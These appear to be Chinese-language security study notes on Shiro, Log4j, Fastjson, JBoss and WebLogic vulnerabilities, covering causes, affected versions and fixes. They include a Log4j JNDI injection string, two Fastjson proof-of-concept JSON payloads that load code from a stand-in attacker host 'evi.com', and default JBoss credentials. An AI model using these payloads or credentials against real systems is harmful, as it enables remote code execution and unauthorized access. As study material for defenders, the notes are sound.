1、中间件漏洞
态势感知(SA):situation awareness
2、常见软件服务漏洞
shiro550和721漏洞区别;
java框架,4a认证,认证授权会话加密。
登录后有个remember me选项,记住会话,验证时先看remember me 选项是否勾选
;若勾选,将用户身份序列化,再AES加密,之后base64编码;
之后将处理好的内容,放入cookie的remember字段,此时客户端发送请求,带着cookie,对其中remember字段进行解码解密反序列化,获取身份;
shiro550(CVE-2016-4437)
版本Apache Shiro < 1.2.4,vulhub中 CVE-2016-4437;
抓包登录过程中,登录就会有set-cookie,失败cookie会加remember=deleteme;成功则会返回AES+base64后的数据
不管成功失败,回显remember,直接利用漏洞验证工具
shiro721(CVE-2019-12422)
版本Apache Shiro < 1.2.4;
秘钥不再写死,不知密钥的前提下构造序列化的数据;
原理: shiro提供加解密,利用解密器;利用shiro分组解密提供的密文,解密后对明文填充,计算中间值,得到明文值,再进而篡改序列化数据;
3、log4j漏洞讲解(CVE-2021-44228)
版本<2.14.0前;look up功能注入,在log4j配置文件任意位置添加值的方法,存在jndi,在日志输出是未对其内容过滤,造成jndi协议加载远程恶意代码;实现远程代码执行(RCE)
${jndi:rmi://xxxx:1009/evil};
攻击者定义一个接口,携带lookup支持表达式请求服务器操作,log4j打印请求信息,之后执行jndi操作;
修复:升级版本到2.17以上,禁止jndi加载远程资源;
4、fastjosn漏洞
java语言中的json库;用于json和java对象转换;
1.2.24及以下 主要是因为,没有对序列化的类做校验,导致漏洞产生;1.2.25-1.2.41增加了黑名单限制,更改`autoType`默认为关闭选项,加入了checkAutotype,部分未过滤L;。1.2.42版本是对1.2.41及以下版本的黑名单绕过(双写LL;;),代码内更新字符串黑名单为hash方式1.2.43版本是对1.2.42及以下版本的黑名单绕过1.2.44-1.2.45版本1.2.43版本黑名单无法绕过,寻找新的利用链进行利用1.2.47版本 利用`fastjson`处理`Class`类时的操作,将恶意类加载到缓存中,实现攻击1.2.62-1.2.67版本 `Class`不会再往缓存中加载恶意类,寻找新的利用链进行突破1.2.68版本,使用期望类`AutoCloseable`来绕过`fastjson`校验1.2.72-1.2.80使用期望类Throwable的子类,进行饶过
判断:
- 模拟post传参,json数据尝试
- 报错:com.ailibaba.fastjson.JSON
<1.2.24版本 poc:
{
"b":{"@type":"com.sun.rowset.JdbcRowSetlmpl", 读取被加载错误类型,未过滤type类
"dataSourceName":"rmi://evi.com:9999/dnslog", 一个机器执行另一台机器的命令
"autoCommit":true
}
}
1.2.47版本 poc:
{
"a":{
"@type":"java.lang.Class", 读取被加载错误类型
"val":"com.sun.rowset.JdbcRowsSetlmpl"
},"b":{
"@type":"com.sun.rowset.JdbcRowSetlmpl", 读取被加载错误类型
"dataSourceName":"rmi://evi.com:9999/dnslog", 一个机器执行另一台机器的命令
"autoCommit":true
}
}
5、jboss弱口令
web服务器,管理路径jmx-console/和/web-console默认弱口令admin/vulhub;版本 <4.x,
5.x和6.x路径为/jmx-console/和/admin-console/,默认密码存储:jboss/server/default/conf/props/jmx-console-users.properties
6、weblogic
基于javaee的中间件;
ssrf,版本10.0.2-10.3.6 探测内网服务,进行攻击redis、fastcgi等,ssrf反弹shell,反向链接
修复:升级版本补丁;限制/删除uddiexplorer应用只能内网访问;讲将SearchPublicRegistries.jsp直接删除
文件上传;
访问/ws_utc/config.do(未授权访问)